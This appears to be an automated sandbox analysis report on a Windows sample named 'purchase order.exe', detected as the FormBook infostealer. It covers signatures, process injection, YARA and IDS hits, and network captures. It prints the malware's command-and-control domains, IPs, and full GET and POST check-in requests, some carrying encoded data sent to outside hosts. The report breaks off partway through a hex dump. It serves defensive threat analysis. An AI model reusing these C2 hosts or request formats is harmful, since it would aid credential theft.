Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
purchase order.exe

Overview

General Information

Sample name:purchase order.exe
Analysis ID:1569753
MD5:79bfe4cd6855c69c57c3b6b3a2ad898f
SHA1:f8e1d7de0aa66ac4a38d5b63d5e125d869ffe7a4
SHA256:c8040b1741912e0e0ecf072a20889dea7c880b6dfa1d0d1579c996a99779ac1f
Tags:exeuser-julianmckein
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • purchase order.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\purchase order.exe" MD5: 79BFE4CD6855C69C57C3B6B3A2AD898F)
    • purchase order.exe (PID: 7900 cmdline: "C:\Users\user\Desktop\purchase order.exe" MD5: 79BFE4CD6855C69C57C3B6B3A2AD898F)
      • olMGHvjsNFhNU.exe (PID: 5332 cmdline: "C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cacls.exe (PID: 7348 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
          • olMGHvjsNFhNU.exe (PID: 5216 cmdline: "C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3517878264.0000000003250000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3517932349.00000000032A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.2390943526.0000000004A30000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.purchase order.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.purchase order.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-06T09:32:50.567866+010020507451Malware Command and Control Activity Detected192.168.2.44979374.208.236.15680TCP
                2024-12-06T09:33:15.401198+010020507451Malware Command and Control Activity Detected192.168.2.44985484.32.84.3280TCP
                2024-12-06T09:33:30.175870+010020507451Malware Command and Control Activity Detected192.168.2.44989313.248.169.4880TCP
                2024-12-06T09:33:44.927682+010020507451Malware Command and Control Activity Detected192.168.2.44992866.29.149.4680TCP
                2024-12-06T09:33:59.682341+010020507451Malware Command and Control Activity Detected192.168.2.4499673.33.130.19080TCP
                2024-12-06T09:34:14.929015+010020507451Malware Command and Control Activity Detected192.168.2.450005129.226.153.8580TCP
                2024-12-06T09:34:30.508372+010020507451Malware Command and Control Activity Detected192.168.2.450033104.21.7.18780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: purchase order.exeReversingLabs: Detection: 34%
                Source: purchase order.exeVirustotal: Detection: 40%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3517878264.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3517932349.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2390943526.0000000004A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2360246710.0000000002350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: purchase order.exeJoe Sandbox ML: detected
                Source: purchase order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: purchase order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: purchase order.exe, 00000003.00000002.2358800767.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000002.3517608915.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: purchase order.exe, 00000003.00000002.2358800767.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000002.3517608915.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: olMGHvjsNFhNU.exe, 00000006.00000000.2274072509.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp, olMGHvjsNFhNU.exe, 00000008.00000000.2434347774.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: purchase order.exe, 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2361013060.0000000003365000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2358877344.000000000319E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: purchase order.exe, purchase order.exe, 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000007.00000003.2361013060.0000000003365000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2358877344.000000000319E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CEC940 FindFirstFileW,FindNextFileW,FindClose,7_2_02CEC940
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h7_2_02CD9E50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then xor eax, eax7_2_02CD9E50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then pop edi7_2_02CDE4AE
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h7_2_02CD9E46
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov ebx, 00000004h7_2_034104BE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49793 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49854 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49893 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49928 -> 66.29.149.46:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49967 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50005 -> 129.226.153.85:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50033 -> 104.21.7.187:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.aktmarket.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
                Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /raea/?yhXxt4VH=PqKj/8KuIq0WSNkKBtU6xtT3L0EMxYs1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp4la8Hrjym6l49HTLUW+OY0E4RirZFYV27mA=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.christinascuties.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /jytl/?yhXxt4VH=g6hM5OfAy0aZTOdwti/FGwGF0lxL069nbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4IM1EjQT2IGwGJnxeHmxIKuUG6sD+9Xyx6N0=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.techmiseajour.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wb7v/?yhXxt4VH=IA0aHAKfw1DI7Bcblr+MbxWptTyqPXzIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwND/F2b9kUq8bbEXkcoGvOpHRcusnJqNxo6xE=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.aktmarket.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /r2k9/?yhXxt4VH=R82aEe+RY/7ruopITyLMIZWKv2xl/sjUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z32+Zxn0+WKbZAwLkeWsMT5GXOfSG7vseuCs=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.golivenow.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rbqc/?yhXxt4VH=3OhzIPQDpE/WyOq4c54Fyv33ZIsYjpJwFHC8VhGgYWlBNCQMRbA04lYXhcibOdGaaYQUE3h/dXM8I7VGN3rliaUrIlqLG+JAYIZgOxd79aoCwxPUFZEjsrU=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.iglpg.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /pfw9/?yhXxt4VH=45l5W170mEENNSUnzK4z1bTcnj7w1ape/JClWAxqTX/Xh+MpzQee3AwDIBzH94Waz7MWeOxtR7oNILZ5PKGZPlZ4cFkLSrPaRO4QE3Rmb2BtP350cPbvkbU=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.1qcczjvh2.autosConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4gxa/?yhXxt4VH=IVIViSCd4+diLw5hx6pqKzAzzXjH0VWsQQRVAN/m1p/rxaGnfzS1IkXZSHFapfjNT88wuN41KZDTvbIxWygy4ZsRlEWQLVi632NRXOHwjbynndNV+ecoPQE=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.gk88top.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.christinascuties.net
                Source: global trafficDNS traffic detected: DNS query: www.techmiseajour.net
                Source: global trafficDNS traffic detected: DNS query: www.aktmarket.xyz
                Source: global trafficDNS traffic detected: DNS query: www.golivenow.live
                Source: global trafficDNS traffic detected: DNS query: www.iglpg.online
                Source: global trafficDNS traffic detected: DNS query: www.1qcczjvh2.autos
                Source: global trafficDNS traffic detected: DNS query: www.gk88top.top
                Source: unknownHTTP traffic detected: POST /jytl/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.techmiseajour.netCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 205Origin: http://www.techmiseajour.netReferer: http://www.techmiseajour.net/jytl/User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36Data Raw: 79 68 58 78 74 34 56 48 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 69 47 54 71 79 70 4f 65 41 65 42 37 79 62 41 55 5a 6c 62 67 66 4b 70 66 6b 59 77 6d 65 47 59 61 4c 51 3d 3d Data Ascii: yhXxt4VH=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUiGTqypOeAeB7ybAUZlbgfKpfkYwmeGYaLQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Fri, 06 Dec 2024 08:32:50 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 08:33:36 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 08:33:39 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 08:33:42 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 